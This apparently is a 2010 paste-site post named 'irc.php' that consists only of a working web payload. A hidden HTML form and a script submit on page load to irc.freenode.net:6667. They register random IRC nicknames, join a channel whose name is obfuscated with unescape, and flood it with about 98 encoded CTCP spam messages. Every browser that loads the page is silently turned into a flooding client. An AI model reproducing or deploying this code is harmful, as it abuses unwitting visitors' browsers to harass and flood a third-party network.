- Subject
- irc.php
- Author
- anthony
- Description
- No description given
- Posted on
- Thu, 28 Jan 2010 20:03:06 +0100
- Content
-
<form action="http://irc.freenode.net:6667/" method="post" enctype="text/plain">
<textarea style="display:none" id="x" name="x"></textarea>
<input type="submit" style="display:none;" />
</form>
<script type="text/javascript">
function randomString(length) {
var chars = "abcdefghiklmnopqrstuvwxyz";
var randomstring = '';
for (var i=0; i<length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}
return randomstring;
}
n=randomString(Math.floor(Math.random()*10+3));
i=randomString(Math.floor(Math.random()*10+3));
te=document.getElementById('x');
te.value = '\nUSER '+i+' 8 * :'+n+'\nNICK '+n+'\nJOIN '+unescape('%u0023%u0074%u0068%u0072%u006f%u0061%u0074%u0065%u0064%u000a')+'\n'+new Array(99).join('PRIVMSG '+unescape('%u0023%u0074%u0068%u0072%u006f%u0061%u0074%u0065%u0064%u000a')+' :\001'+unescape('%u0056%u0045%u0052%u0053%u0049%u004f%u004e%u0020%u0047%u004e%u0041%u0041%u0020%u003e%u0020%u006a%u0030%u0030')+'\001\n');
te.parentNode.submit()
</script>